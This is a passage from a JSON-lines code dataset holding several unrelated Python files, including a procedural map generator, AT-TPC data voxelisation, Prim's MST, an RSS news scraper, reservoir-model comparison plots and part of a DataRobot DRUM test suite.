map_proc[init_pos[0]][init_pos[1]] = str(x)\n init_pos[0] = init_pos[0] + x\n else:\n # Move incremental x, then move y,\n xd = random.randint(1, 9)\n map_proc[init_pos[0]][init_pos[1]] = str(xd)\n init_pos[0] = init_pos[0] + xd\n if 0 < y < 10:\n map_proc[init_pos[0]][init_pos[1]] = str(y)\n init_pos[0] = init_pos[0] + y\n else:\n # Move incremental y, then check if we made it.\n yd = random.randint(1, 9)\n map_proc[init_pos[0]][init_pos[1]] = str(yd)\n init_pos[0] = init_pos[0] + yd\n if node != init_pos:\n node_list.appendleft(node)\n else:\n # Try again\n snake_proc(init_pos, node_list)\n else:\n return\n\n # Generate list of tuples to traverse\n traversals = [[random.randint(1, size - 1), random.randint(1, size - 1)] for x in range(num_nodes)]\n for tuples in traversals:\n print(str(tuples))\n # Find and sort Tuples into traversal order.\n\n # Add nearest goal state to finish solution.\n node_deque = deque(traversals)\n last_node = node_deque.pop()\n if last_node[0] > start_pos[0]:\n if last_node[1] > start_pos[1]:\n node_deque.append([0, 0])\n else:\n node_deque.append([0, size - 1])\n else:\n if last_node[1] > start_pos[1]:\n node_deque.append([size - 1, 0])\n else:\n node_deque.append([size - 1, size - 1])\n # Run snake to leave solution moves.\n snake_proc(start_pos, node_deque)\n # Fill the rest of the array with(hopefully) junk values.\n for i in map_proc:\n for j in range(size):\n if i[j] == '#':\n i[j] = str(random.randint(1, 9))\n\n return map_proc\n\n\nmap_test = map_procedure(21, 7)\nfor x in map_test:\n print(' '.join(x))\n\nprint(TreasureAlgorithms.backtrack())","sub_path":"ProcedureMap.py","file_name":"ProcedureMap.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"85565559","text":"from signaturefunctions import *\n\n\ndef signature_by_stem_data(Lexicon):\n SignatureStemList = dict()\n SigDataDict = dict()\n for sig_string in Lexicon.SignatureStringsToStems:\n sig_list = MakeSignatureListFromSignatureString(sig_string)\n SignatureStemList[sig_string] = list()\n for stem in Lexicon.SignatureStringsToStems[sig_string]:\n SignatureStemList[sig_string].append(stem)\n\n SigDataDict[sig_string] = dict()\n for affix in sig_list:\n SigDataDict[sig_string][affix] = list()\n for stem in SignatureStemList[sig_string]:\n word = stem + affix\n SigDataDict[sig_string][affix].append(Lexicon.WordCounts[word])\n return (SignatureStemList, SigDataDict)\n","sub_path":"dataviz.py","file_name":"dataviz.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"71697928","text":"##############################################\r\n# #\r\n# Поиск неуникальных элементов в массиве #\r\n# #\r\n##############################################\r\n\r\ncheckio=[]\r\nprint(\"Введите элементы массива: \")\r\nfor n in range(1000):\r\n a=input(\"\")\r\n if a==\"0\":\r\n break\r\n else:\r\n checkio.append(a)\r\n \r\n#checkio=[1, 2, 3, 1, 3, 5, 3, 6, 7, 5]\r\nprint(\"Дан массив: \", checkio)\r\nlst=list(checkio)\r\nres=[]\r\nfor n in lst:\r\n a=lst.count(n)\r\n if a!=1:\r\n res.append(n)\r\nprint(\"Массив неуникальных элементов: \", res)\r\n","sub_path":"non-unique elements.py","file_name":"non-unique elements.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"612531953","text":"#!/usr/bin/env python3\n\"\"\"Script for generating discretized ATTPC data.\n\nAuthor: Anton Såmark-Roth\n\nOriginal Author: Ryan Strauss\n\"\"\"\nimport click\nimport h5py\nimport numpy as np\nimport os\nimport pandas as pd\n#import pytpc\nimport scipy as sp\nfrom sklearn.utils import shuffle\n\nfrom data_processing.data import read_and_label_data, X_COL, Y_COL, Z_COL, CHARGE_COL\n\nimport math\n\n# Currently we're setting the image pixel values as the logarithm of the charge!\ndef _l(a):\n return 0 if a == 0 else math.log10(a)\n\ndef generate_voxelised_data_set(data_dir, save_dir, prefix, nbr_bins=20):\n print(\"Generating voxelised data set ...\")\n \n X_DISC, Y_DISC, Z_DISC = nbr_bins, nbr_bins, nbr_bins\n \n # Create empty array to hold data\n data = []\n\n raw_data = list(read_and_label_data(data_dir).values())\n for i, l in enumerate(raw_data):\n xyzs = raw_data[i][0]\n data.append([discretize_grid_charge(xyzs, X_DISC, Y_DISC, Z_DISC), raw_data[i][1]])\n\n # Split into train and test sets\n print(\"Split into train and test sets ...\")\n data = shuffle(data)\n partition = int(len(data) * 0.8)\n train = data[:partition]\n test = data[partition:]\n\n train_features = [t[0] for t in train]\n train_targets = [t[1] for t in train]\n test_features = [t[0] for t in test]\n test_targets = [t[1] for t in test]\n\n train_features = sp.sparse.vstack(train_features, format='csr')\n test_features = sp.sparse.vstack(test_features, format='csr')\n\n # Save\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n print('Saving to npz and HDF5 file...')\n sp.sparse.save_npz(os.path.join(save_dir, '{}train-features.npz'.format(prefix)), train_features)\n sp.sparse.save_npz(os.path.join(save_dir, '{}test-features.npz'.format(prefix)), test_features)\n h5 = h5py.File(os.path.join(save_dir, '{}voxels.h5'.format(prefix)), 'w')\n h5.create_dataset('train_targets', data=train_targets)\n h5.create_dataset('test_targets', data=test_targets)\n h5.close()\n\nDETECTOR_LENGTH = 1250.0\nDETECTOR_RADIUS = 275.0\n\ndef get_xyz_from_bucket(bucket_num, x_disc, y_disc, z_disc):\n z = np.floor_divide(bucket_num,(x_disc*y_disc))\n y = np.floor_divide(bucket_num - z*x_disc*y_disc, x_disc)\n x = bucket_num - z*x_disc*y_disc - y*x_disc\n return x, y, z\n\ndef discretize_grid_charge(xyz, x_disc, y_disc, z_disc):\n \"\"\"Discretizes AT-TPC point cloud data-processing using a grid geometry by totalling\n charge of hits in a given rectangular bucket.\n\n Parameters\n ----------\n xyz : point cloud data-processing with shape (n,5) where n is the number of traces\n x_disc : number of slices in x\n y_disc : number of slices in y\n z_disc : number of slices in z\n\n Returns\n -------\n The discretized data-processing in a csr sparse matrix of shape (1, x_disc*y_disc*z_disc)\n \"\"\"\n\n # calculate desired discreuniform_param_generatortization resolution\n disc_elements = x_disc * y_disc * z_disc\n\n buckets = []\n charges = []\n\n for i, point in enumerate(xyz):\n #if i < 2:\n # print(point[0], point[1], point[2])\n # check that z-coordinate of point is in appropriate range\n if point[Z_COL] > DETECTOR_LENGTH:\n continue\n\n x_bucket = math.floor(((point[X_COL] + DETECTOR_RADIUS) / (2 * DETECTOR_RADIUS)) * x_disc)\n y_bucket = math.floor(((point[Y_COL] + DETECTOR_RADIUS) / (2 * DETECTOR_RADIUS)) * y_disc)\n z_bucket = math.floor((point[Z_COL] / DETECTOR_LENGTH) * z_disc)\n\n bucket_num = z_bucket * x_disc * y_disc + x_bucket + y_bucket * x_disc\n\n buckets.append(bucket_num)\n \n x, y, z = get_xyz_from_bucket(bucket_num, x_disc, y_disc, z_disc)\n \n assert x == x_bucket\n assert y == y_bucket\n assert z == z_bucket\n\n # scaling by factor of 1000\n #charges.append(point[CHARGE_COL] / 1000)\n # log10 scaling\n charges.append(np.log10(point[CHARGE_COL]))\n\n cols = buckets\n rows = np.zeros(len(cols))\n data = charges\n\n # automatically sums charge values for data-processing occuring at the (row, col)\n discretized_data_sparse_CHARGE = sp.sparse.csr_matrix((data, (rows, cols)), shape=(1, disc_elements))\n return discretized_data_sparse_CHARGE\n\n\n\n@click.command()\n@click.argument('data_dir', type=click.Path(exists=True, file_okay=False, dir_okay=True), nargs=1)\n@click.option('--save_dir', type=click.Path(exists=False, file_okay=False, dir_okay=True), default='',\n help='Where to save the generated data.')\n@click.option('--prefix', type=click.STRING, default='',\n help='Prefix for the saved file names and/or files read in. By default, there is no prefix.')\n\ndef main(data_dir, save_dir, prefix):\n \"\"\"This script will discretize and save ATTPC event data.\n \"\"\"\n\n generate_voxelised_data_set(data_dir, save_dir, prefix)\n\nif __name__ == '__main__':\n main()\n","sub_path":"data_processing/generate_voxels.py","file_name":"generate_voxels.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"11184604","text":"\"\"\"\nYour task is to run Prim's minimum spanning tree algorithm\non this graph. You should report the overall cost of a minimum\nspanning tree\n\"\"\"\nimport heapq\n\n\nclass Edge:\n def __init__(self, node1, node2, weight):\n self.node1 = node1\n self.node2 = node2\n self.weight = weight\n\n def other_node(self, node):\n if node == self.node1:\n return self.node2\n elif node == self.node2:\n return self.node1\n else:\n raise KeyError\n\n def __lt__(self, other):\n return self.weight < other.weight\n\n def __gt__(self, other):\n return self.weight > other.weight\n\n\nclass WeightedGraph:\n \"\"\"Encapsulates graphs, has functions to mark nodes / edges as explored\n \"\"\"\n def __init__(self):\n self.graph = dict()\n self.explored_edges = dict()\n self.explored_nodes = dict()\n\n def add_edge(self, node1, node2, weight):\n \"Add an edge to the graph\"\n new_edge = Edge(node1, node2, weight)\n self.graph[node1] = self.graph.get(node1, []) + [new_edge]\n self.graph[node2] = self.graph.get(node2, []) + [new_edge]\n\n def mark_node_explored(self, node):\n \"Mark a node as explored, note this does not mark an edge as explored\"\n self.explored_nodes[node] = True\n\n def mark_edge_explored(self, edge):\n \"Mark an edge explored, note this does not mark either node explored\"\n self.explored_edges[edge] = True\n\n def is_explored_node(self, node):\n return self.explored_nodes.get(node, False)\n\n def is_explored_edge(self, edge):\n return self.explored_edges.get(edge, False)\n\n def all_nodes_explored(self):\n return len(self.explored_nodes) == len(self.graph)\n\n def all_nodes(self):\n return iter(self.graph.keys())\n\n def get_edges(self, node):\n return self.graph[node]\n\n\nclass EdgeHeap:\n \"Implements a min heap of edges (key is the edge weight)\"\n def __init__(self):\n self.heap = []\n\n def add_edge(self, edge):\n heapq.heappush(self.heap, edge)\n\n def get_min(self):\n return heapq.heappop(self.heap)\n\n def __len__(self):\n return len(self.heap)\n\n\ndef prim_mst(graph):\n \"calculates min span tree of a graph and returns total weight\"\n node = next(graph.all_nodes())\n edge_heap = EdgeHeap()\n sum = 0\n while(True):\n graph.mark_node_explored(node)\n for edge in graph.get_edges(node):\n if graph.is_explored_edge(edge):\n continue\n elif graph.is_explored_node(edge.other_node(node)):\n continue\n else:\n graph.mark_edge_explored(edge)\n edge_heap.add_edge(edge)\n if graph.all_nodes_explored():\n break\n\n while(True):\n next_edge = edge_heap.get_min()\n node1 = next_edge.node1\n node2 = next_edge.node2\n if not graph.is_explored_node(node1):\n sum += next_edge.weight\n node = node1\n break\n elif not graph.is_explored_node(node2):\n sum += next_edge.weight\n node = node2\n break\n return sum\n\n\ndef main():\n data = \"/Users/brendonsullivan/Documents/docs/coursera_hw/primm_mst.txt\"\n graph = WeightedGraph()\n with open(data, 'r') as f:\n header = True\n for line in f:\n if header:\n header = False\n continue\n node1, node2, weight = [int(x) for x in line.split(' ')]\n graph.add_edge(node1, node2, weight)\n print(prim_mst(graph))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"coursera/algorithms/course_3/problem_set_1_3.py","file_name":"problem_set_1_3.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"479757380","text":"\"\"\"\nI am going to use the news scraped from news websites to do text summarization.\n\"\"\"\n\n# import required modules\nimport feedparser as fp\nimport json\nimport newspaper # from newspaper3k not newspaper\nfrom newspaper import Article\nfrom time import mktime\nfrom datetime import datetime\nimport os\nfrom nltk import sent_tokenize\nfrom nltk.corpus import stopwords\nfrom functions.TextRank import TextRank_Class\nimport os\n\n\n# load news_websites.jason file\nfile_dir = os.path.dirname(os.path.realpath(__file__))\npath = file_dir + '/docs/'\nwith open((path + 'news_websites.json'), encoding='utf-8') as f:\n news_websites = json.load(f)\n\n\n# the process to scrape news\nnews_data = {}\n\nnews_data['articles'] = {}\n\ncount = 1\n\nlimit = 1\n\nfor company, value in news_websites.items():\n\n # read news from rss\n \"\"\"\n From wiki:\n RSS (Rich Site Summary) originally RDF Site Summary often called\n 'Really Simple Syndication' is a type of web feed which allows users to\n access updates to online content in a standardized, computer-readable\n format.\n \"\"\"\n if 'rss' in value:\n\n # read the content of rss file\n d = fp.parse(value['rss'])\n print(\"Downloading articles from \", company)\n\n # create a dict to save the data read from current rss\n news_website = {\n \"rss\": value['rss'],\n \"link\": value['link'],\n \"articles\": [] # there is no articles yet\n }\n\n for entry in d.entries:\n\n # Check if the news is published\n # hasattr checks whether an attribute exist\n if hasattr(entry, 'published'):\n\n # we are going to scrape only limited number of news from each\n # website\n if count > limit:\n break\n\n # create dict to store the information of news\n article = {}\n article['link'] = entry.link\n date = entry.published_parsed\n article['published'] = (datetime.\n fromtimestamp(mktime(date)).\n isoformat())\n\n # Article function will acquried the articles from a given url\n try:\n content = Article(entry.link)\n content.download()\n content.parse()\n except Exception as e:\n # If the download for some reason fails (ex. 404) the\n # script will continue downloading the next article.\n print(e)\n print(\"continuing...\")\n continue\n\n # Then store the attributes of this article\n article['title'] = content.title\n article['text'] = content.text\n news_website['articles'].append(article)\n print(count, \"articles downloaded from\", company, \", url: \",\n entry.link)\n count = count + 1\n\n # If the RSS is not available\n else:\n print(\"Building site for \", company)\n paper = newspaper.build(value['link'], memoize_articles=False)\n news_website = {\n \"link\": value['link'],\n \"articles\": []\n }\n # noneTypeCount to record the unwanted news; for example, no publish\n # date.\n noneTypeCount = 0\n for content in paper.articles:\n if count > limit:\n break\n try:\n content.download()\n content.parse()\n except Exception as e:\n print(e)\n print(\"continuing...\")\n continue\n # After 10 downloaded articles from the same newspaper without\n # publish date, the company will be skipped.\n if content.publish_date is None:\n print(count, \" Article has no publish date...\")\n noneTypeCount = noneTypeCount + 1\n if noneTypeCount > 10:\n print(\"Too many noneType dates, aborting...\")\n noneTypeCount = 0\n break\n count = count + 1 # even thought there is no article\n # downloaded, the count still increase one\n continue\n article = {}\n article['title'] = content.title\n article['text'] = content.text\n article['link'] = content.url\n article['published'] = content.publish_date.isoformat()\n news_website['articles'].append(article)\n print(count, \"articles downloaded from\", company,\n \" using newspaper, url: \", content.url)\n count = count + 1\n noneTypeCount = 0\n\n # save the scraped news into the news_data\n count = 1\n news_data['articles'][company] = news_website\n\n\n# save the scraped news information\nfile_dir = os.path.dirname(os.path.realpath(__file__))\nos.chdir(file_dir + '/docs')\nwith open('news_data.json', 'w', encoding='utf-8') as f:\n json.dump(news_data, f)\n\n\"\"\"\n#\nos.chdir(\"/Users/rucachen/Desktop/open_pycharm_virtualenv_3.6.4/News_Summarization/TextRank\")\nwith open('test', 'r') as f:\n data = f.readlines()\n\n#a = news_data[\"articles\"][\"bbc\"][\"articles\"][0].get(\"text\")\n#data = sent_tokenize(a)\nstop_words = set(stopwords.words('english'))\ntest = TextRank_Class.TextRank(data, 0.1)\ntest_S_matrix = test.build_similarity_matrix(stopwords=stop_words)\ntest_PageRank = test.pagerank()\ntest_Top_Sentence = test.acquire_top_sentence()\ntest.Top_Sentence\n\"\"\"\n","sub_path":"calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"308541879","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# should match columns\nvegscens = ['Control', 'Treatment',\n 'OldFireModel_Extreme_Control',\n 'OldFireModel_Moderate_Control',\n 'OldFireModel_Extreme_Treatment',\n 'OldFireModel_Moderate_Treatment']\n\nenvscen = 'FERC'\n\nhistoropt = 'hist'\n\n# comparison 1: total power generation FRM+HHL\ndf_FRM = pd.read_csv('oasis-csv/FRM-monthly-generation-MWh.csv', index_col=0, parse_dates=True)\ndf_HHL = pd.read_csv('oasis-csv/HHL-monthly-generation-MWh.csv', index_col=0, parse_dates=True)\n\nprint('Comparing total annual generation...')\nfor vs in vegscens:\n fname = vs + '_' + envscen + '.csv'\n df = pd.read_csv('timeseries/%s-policy/'%historopt + fname, index_col=0, parse_dates=True)\n power = df.total_power.resample('AS-OCT').sum()\n power2 = (df_FRM[vs] + df_HHL[vs]).resample('AS-OCT').sum()\n r2 = np.corrcoef(power.values, power2.values)**2\n print(fname + ',' + str(r2[0,1]))\n\n power.plot()\n power2.plot()\n plt.legend(['Our model', 'OASIS'])\n plt.ylabel('FRM+HHL total generation, MWh/year')\n plt.savefig('oasis-plots/%s-policy/'%historopt + 'total-power_%s_%s.png' % (vs, envscen))\n plt.close()\n\n# comparison 2: storage at different timescales\nprint('Comparing HHL daily storage...')\ndf_FRM = pd.read_csv('oasis-csv/FRM-daily-storage-AF.csv', index_col=0, parse_dates=True)\ndf_HHL = pd.read_csv('oasis-csv/HHL-daily-storage-AF.csv', index_col=0, parse_dates=True)\n\nfor vs in vegscens:\n fname = vs + '_' + envscen + '.csv'\n df = pd.read_csv('timeseries/%s-policy/'%historopt + fname, index_col=0, parse_dates=True)\n storage = df.SHHL\n storage2 = df_HHL[vs] / 1000\n r2 = np.corrcoef(storage.values, storage2.values)**2\n print(fname + ',' + str(r2[0,1]))\n storage.plot()\n storage2.plot()\n plt.legend(['Our model', 'OASIS'])\n plt.ylabel('Storage (TAF)')\n plt.savefig('oasis-plots/%s-policy/'%historopt + 'HHLStorage_%s_%s.png' % (vs, envscen))\n plt.close()\n\nprint('Comparing FMD daily storage...')\nfor vs in vegscens:\n fname = vs + '_' + envscen + '.csv'\n df = pd.read_csv('timeseries/%s-policy/'%historopt + fname, index_col=0, parse_dates=True)\n storage = df.SFMD\n storage2 = df_FRM[vs] / 1000\n r2 = np.corrcoef(storage.values, storage2.values)**2\n print(fname + ',' + str(r2[0,1]))\n storage.plot()\n storage2.plot()\n plt.legend(['Our model', 'OASIS'])\n plt.ylabel('Storage (TAF)')\n plt.savefig('oasis-plots/%s-policy/'%historopt + 'FMDStorage_%s_%s.png' % (vs, envscen))\n plt.close()","sub_path":"results/test-darin-data.py","file_name":"test-darin-data.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"543485402","text":"import datetime\n\nformats=[\"%d/%m/%Y %H:%M:%S\",\n \"%d/%m/%Y %H:%M%f\",\n \"%Y-%m-%d %H:%M:%S.%f\",\n \"%m/%d/%Y\",\n \"%d/%m/%Y\",\n \"%m-%d-%Y\",\n \"%d-%m-%Y\",\n \"%H:%M:%S\",\n \"%M:%S\"\n ] \n\n\nfor ft in formats:\n time = datetime.datetime.now()\n time = time.strftime(ft)\n print(\"Format\",ft,\": \", time)\n","sub_path":"pyshine/15-drag_drop_plot/date_time_formats.py","file_name":"date_time_formats.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"630599791","text":"import collections\nimport glob\nimport json\nimport os\nimport pickle\nimport re\nimport shutil\nimport signal\nimport subprocess\nimport time\nfrom tempfile import NamedTemporaryFile\nfrom threading import Thread\nfrom unittest import mock\nfrom uuid import uuid4\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nimport requests\n\nfrom datarobot_drum.drum.args_parser import CMRunnerArgsRegistry\nfrom datarobot_drum.drum.common import (\n ArgumentsOptions,\n CUSTOM_FILE_NAME,\n CustomHooks,\n PythonArtifacts,\n RunMode,\n)\nfrom datarobot_drum.drum.runtime import DrumRuntime\n\nTRAINING = \"training\"\nINFERENCE = \"inference\"\n\n# Framweork keywords\nXGB = \"xgboost\"\nKERAS = \"keras\"\nKERAS_JOBLIB = \"keras_joblib\"\nSKLEARN = \"sklearn\"\nSIMPLE = \"simple\"\nPYTORCH = \"pytorch\"\nPYPMML = \"pypmml\"\n\nRDS = \"rds\"\nCODEGEN = \"jar\"\n## adding h2o pojo and mojo\nMOJO = \"zip\"\nPOJO = \"java\"\n##\nMULTI_ARTIFACT = \"multiartifact\"\nCODEGEN_AND_SKLEARN = \"codegen_and_sklearn\"\n# Problem keywords, used to mark datasets\nREGRESSION = \"regression\"\nREGRESSION_INFERENCE = \"regression_inference\"\nBINARY = \"binary\"\n\n# Language keywords\nPYTHON = \"python3\"\nNO_CUSTOM = \"no_custom\"\nPYTHON_ALL_HOOKS = \"python_all_hooks\"\nPYTHON_LOAD_MODEL = \"python_load_model\"\nR = \"R\"\nR_ALL_HOOKS = \"R_all_hooks\"\nR_FIT = \"R_fit\"\nJAVA = \"java\"\nPYTHON_XGBOOST_CLASS_LABELS_VALIDATION = \"predictions_and_class_labels_validation\"\n\nDOCKER_PYTHON_SKLEARN = \"cmrunner_test_env_python_sklearn\"\n\nRESPONSE_PREDICTIONS_KEY = \"predictions\"\n\nWEIGHTS_ARGS = \"weights-args\"\nWEIGHTS_CSV = \"weights-csv\"\n\n\nclass DrumServerProcess:\n def __init__(self):\n self.process = None\n self.out_stream = None\n self.err_stream = None\n\n @property\n def returncode(self):\n return self.process.returncode\n\n\nclass DrumServerRun:\n def __init__(\n self,\n framework,\n problem,\n custom_model_dir,\n docker=None,\n with_error_server=False,\n show_stacktrace=True,\n ):\n port = 6799\n server_address = \"localhost:{}\".format(port)\n url_host = os.environ.get(\"TEST_URL_HOST\", \"localhost\")\n if docker:\n self.url_server_address = \"http://{}:{}\".format(url_host, port)\n else:\n self.url_server_address = \"http://localhost:{}\".format(port)\n\n cmd = \"{} server --code-dir {} --address {}\".format(\n ArgumentsOptions.MAIN_COMMAND, custom_model_dir, server_address\n )\n cmd = TestCMRunner._cmd_add_class_labels(cmd, framework, problem)\n if docker:\n cmd += \" --docker {}\".format(docker)\n if with_error_server:\n cmd += \" --with-error-server\"\n if show_stacktrace:\n cmd += \" --show-stacktrace\"\n self._cmd = cmd\n\n self._process_object_holder = DrumServerProcess()\n self._server_thread = None\n\n def __enter__(self):\n self._server_thread = Thread(\n target=TestCMRunner.run_server_thread, args=(self._cmd, self._process_object_holder)\n )\n self._server_thread.start()\n time.sleep(0.5)\n\n TestCMRunner.wait_for_server(\n self.url_server_address, timeout=10, process_holder=self._process_object_holder\n )\n\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n # shutdown server\n response = requests.post(self.url_server_address + \"/shutdown/\")\n assert response.ok\n time.sleep(1)\n\n self._server_thread.join()\n\n @property\n def process(self):\n return self._process_object_holder or None\n\n\nclass TestCMRunner:\n @classmethod\n def setup_class(cls):\n cls.tests_root_path = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\n cls.tests_fixtures_path = os.path.join(cls.tests_root_path, \"fixtures\")\n cls.tests_artifacts_path = os.path.join(cls.tests_fixtures_path, \"drop_in_model_artifacts\")\n cls.tests_data_path = os.path.join(cls.tests_root_path, \"testdata\")\n cls.training_templates_path = os.path.join(\n cls.tests_root_path, \"..\", \"model_templates\", \"training\"\n )\n\n cls.paths_to_training_models = {\n (PYTHON, SKLEARN): os.path.join(cls.training_templates_path, \"python3_sklearn\"),\n (PYTHON, SIMPLE): os.path.join(cls.training_templates_path, \"simple\"),\n (PYTHON, KERAS): os.path.join(cls.training_templates_path, \"python3_keras_joblib\"),\n (PYTHON, XGB): os.path.join(cls.training_templates_path, \"python3_xgboost\"),\n (R_FIT, RDS): os.path.join(cls.training_templates_path, \"r_lang\"),\n (PYTHON, PYTORCH): os.path.join(cls.training_templates_path, \"python3_pytorch\"),\n }\n\n cls.fixtures = {\n PYTHON: (os.path.join(cls.tests_fixtures_path, \"custom.py\"), \"custom.py\"),\n NO_CUSTOM: (None, None),\n PYTHON_ALL_HOOKS: (\n os.path.join(cls.tests_fixtures_path, \"all_hooks_custom.py\"),\n \"custom.py\",\n ),\n PYTHON_XGBOOST_CLASS_LABELS_VALIDATION: (\n os.path.join(cls.tests_fixtures_path, \"pred_validation_custom.py\"),\n \"custom.py\",\n ),\n PYTHON_LOAD_MODEL: (\n os.path.join(cls.tests_fixtures_path, \"load_model_custom.py\"),\n \"custom.py\",\n ),\n R: (os.path.join(cls.tests_fixtures_path, \"custom.R\"), \"custom.R\"),\n R_ALL_HOOKS: (os.path.join(cls.tests_fixtures_path, \"all_hooks_custom.R\"), \"custom.R\"),\n R_FIT: (os.path.join(cls.tests_fixtures_path, \"fit_custom.R\"), \"custom.R\"),\n }\n cls.datasets = {\n # If specific dataset should be defined for a framework, use (framework, problem) key.\n # Otherwise default dataset is used (None, problem)\n (None, REGRESSION): os.path.join(cls.tests_data_path, \"boston_housing.csv\"),\n (PYPMML, REGRESSION): os.path.join(cls.tests_data_path, \"iris_binary_training.csv\"),\n (None, REGRESSION_INFERENCE): os.path.join(\n cls.tests_data_path, \"boston_housing_inference.csv\"\n ),\n (None, BINARY): os.path.join(cls.tests_data_path, \"iris_binary_training.csv\"),\n }\n\n cls.artifacts = {\n (None, REGRESSION): None,\n (None, BINARY): None,\n (SKLEARN, REGRESSION): os.path.join(cls.tests_artifacts_path, \"sklearn_reg.pkl\"),\n (SKLEARN, REGRESSION_INFERENCE): os.path.join(\n cls.tests_artifacts_path, \"sklearn_reg.pkl\"\n ),\n (MULTI_ARTIFACT, REGRESSION): [\n os.path.join(cls.tests_artifacts_path, \"sklearn_reg.pkl\"),\n os.path.join(cls.tests_artifacts_path, \"keras_reg.h5\"),\n ],\n (CODEGEN_AND_SKLEARN, REGRESSION): [\n os.path.join(cls.tests_artifacts_path, \"java_reg.jar\"),\n os.path.join(cls.tests_artifacts_path, \"sklearn_reg.pkl\"),\n ],\n (SKLEARN, BINARY): os.path.join(cls.tests_artifacts_path, \"sklearn_bin.pkl\"),\n (KERAS, REGRESSION): os.path.join(cls.tests_artifacts_path, \"keras_reg.h5\"),\n (KERAS, BINARY): os.path.join(cls.tests_artifacts_path, \"keras_bin.h5\"),\n (XGB, REGRESSION): os.path.join(cls.tests_artifacts_path, \"xgb_reg.pkl\"),\n (XGB, BINARY): os.path.join(cls.tests_artifacts_path, \"xgb_bin.pkl\"),\n (PYTORCH, REGRESSION): [\n os.path.join(cls.tests_artifacts_path, \"torch_reg.pth\"),\n os.path.join(cls.tests_artifacts_path, \"PyTorch.py\"),\n ],\n (PYTORCH, BINARY): [\n os.path.join(cls.tests_artifacts_path, \"torch_bin.pth\"),\n os.path.join(cls.tests_artifacts_path, \"PyTorch.py\"),\n ],\n (RDS, REGRESSION): os.path.join(cls.tests_artifacts_path, \"r_reg.rds\"),\n (RDS, BINARY): os.path.join(cls.tests_artifacts_path, \"r_bin.rds\"),\n (CODEGEN, REGRESSION): os.path.join(cls.tests_artifacts_path, \"java_reg.jar\"),\n (CODEGEN, BINARY): os.path.join(cls.tests_artifacts_path, \"java_bin.jar\"),\n (POJO, REGRESSION): os.path.join(\n cls.tests_artifacts_path,\n \"pojo_reg\",\n \"drf_887c2e5b_0941_40b7_ae26_cae274c4b424.java\",\n ),\n (POJO, BINARY): os.path.join(\n cls.tests_artifacts_path,\n \"pojo_bin\",\n \"XGBoost_grid__1_AutoML_20200717_163214_model_159.java\",\n ),\n (MOJO, REGRESSION): os.path.join(cls.tests_artifacts_path, \"mojo_reg.zip\"),\n (MOJO, BINARY): os.path.join(cls.tests_artifacts_path, \"mojo_bin.zip\"),\n (PYPMML, REGRESSION): os.path.join(cls.tests_artifacts_path, \"iris_reg.pmml\"),\n (PYPMML, BINARY): os.path.join(cls.tests_artifacts_path, \"iris_bin.pmml\"),\n }\n\n cls.target = {BINARY: \"Species\", REGRESSION: \"MEDV\"}\n cls.class_labels = {\n (SKLEARN, BINARY): [\"Iris-setosa\", \"Iris-versicolor\"],\n (XGB, BINARY): [\"Iris-setosa\", \"Iris-versicolor\"],\n (KERAS, BINARY): [\"Iris-setosa\", \"Iris-versicolor\"],\n (RDS, BINARY): [\"Iris-setosa\", \"Iris-versicolor\"],\n (PYPMML, BINARY): [\"Iris-setosa\", \"Iris-versicolor\"],\n }\n\n @classmethod\n def teardown_class(cls):\n pass\n\n @staticmethod\n def _exec_shell_cmd(cmd, err_msg, assert_if_fail=True, process_obj_holder=None, env=os.environ):\n p = subprocess.Popen(\n cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n shell=True,\n env=env,\n universal_newlines=True,\n )\n if process_obj_holder is not None:\n process_obj_holder.process = p\n\n (stdout, stderr) = p.communicate()\n\n if process_obj_holder is not None:\n process_obj_holder.out_stream = stdout\n process_obj_holder.err_stream = stderr\n\n if p.returncode != 0:\n print(\"stdout: {}\".format(stdout))\n print(\"stderr: {}\".format(stderr))\n if assert_if_fail:\n assert p.returncode == 0, err_msg\n\n return p, stdout, stderr\n\n @classmethod\n def _create_custom_model_dir(\n cls, custom_model_dir, framework, problem, language, is_training=False, nested=False\n ):\n if nested:\n custom_model_dir = custom_model_dir.joinpath(\"nested_dir\")\n custom_model_dir.mkdir(parents=True, exist_ok=True)\n if is_training:\n model_template_dir = cls.paths_to_training_models[(language, framework)]\n\n if language == PYTHON:\n files = glob.glob(r\"{}/*.py\".format(model_template_dir))\n elif language in [R, R_ALL_HOOKS, R_FIT]:\n files = glob.glob(r\"{}/*.r\".format(model_template_dir)) + glob.glob(\n r\"{}/*.R\".format(model_template_dir)\n )\n\n for filename in files:\n shutil.copy2(filename, custom_model_dir)\n else:\n artifact_filenames = cls._get_artifact_filename(framework, problem)\n if artifact_filenames is not None:\n if not isinstance(artifact_filenames, list):\n artifact_filenames = [artifact_filenames]\n for filename in artifact_filenames:\n shutil.copy2(filename, custom_model_dir)\n\n fixture_filename, rename = cls._get_fixture_filename(language)\n if fixture_filename:\n shutil.copy2(fixture_filename, os.path.join(custom_model_dir, rename))\n return custom_model_dir\n\n @classmethod\n def _get_artifact_filename(cls, framework, problem):\n return cls.artifacts[(framework, problem)]\n\n @classmethod\n def _get_class_labels(cls, framework, problem):\n return cls.class_labels.get((framework, 